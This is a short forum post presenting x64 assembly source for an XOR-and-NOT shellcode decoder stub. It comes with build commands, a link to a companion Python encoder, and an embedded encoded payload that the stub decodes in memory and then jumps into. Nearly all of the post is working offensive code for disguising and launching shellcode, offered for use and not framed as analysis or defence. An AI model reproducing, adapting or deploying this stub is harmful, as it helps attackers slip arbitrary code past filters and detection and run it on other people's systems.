Tweet
This is a simple x64 assembly example of a shellcode decoder stub. It is simple and adjustments might need to be made for it to work with any particular shellcode.
The python encoder does not verify if x00 bytes or other bad chars are generated.
The encoder for this example can be found here: https://www.postexplo.com/forum/prog...or-not-encoder
The python encoder does not verify if x00 bytes or other bad chars are generated.
Code:
;title "xornot"
;********************************************************
;* Filename: xornot.asm *
;* Author: Resheph *
;* Version: 0.1 *
;* Kernel: *
;* ISA: x64 *
;* Dist: Kali Linux *
;* Initial Date: *
;* Purpose: Decoder stub *
;********************************************************
; Compile and link using:
; nasm -f elf64 ./xornot.asm -o ./xornot.o -g -Z ./errors.log
; ld -o ./xornot ./xornot.o
; Notes: Linking might not be needed
;********************************************************
; Syscalls in /usr/include/x86_64-linux-gnu/asm/unistd_64.h
; Shellcode may not contain any bad chars
BITS 64
GLOBAL _start ; Entry point for ELF linker
SECTION .data ; Initialized data
SECTION .bss ; Uninitialized data.
SECTION .text ; Code block.
_start:
jmp short stub ; Skip memory so we dont execute the encoded shellcode
encoded: db 0x1d,0x64,0x95,0x05,0x1d,0xee,0x7a,0x37,0x3c,0x3b,0x7a,0x7a,0x26,0x3d,0x06,0x1d,0xdc,0xb2,0x05,0x1d,0xdc,0xb7,0x02,0x1d,0xdc,0xb3,0x1d,0xd6,0x95,0x6e,0x5a,0x50 ; Shellcode
len equ $-encoded ; Calculate length of shellcode
stub:
lea rsi, [rel encoded] ; First encoded byte. Remark this is a address relative to rIP (Position Independent Code)
xor rcx, rcx ; Set rcx to 0
add cl, len ; Get length of encoded shellcode
; Decode using NOT and XOR.
decode:
not byte [rsi]
xor byte [rsi], 0xaa ; XOR with 0xaa. Pick one while encoding, that does not create any bad chars.
inc rsi ; Next
loop decode ; Keep decoding
jmp short encoded ; Jump to shellcode and execute it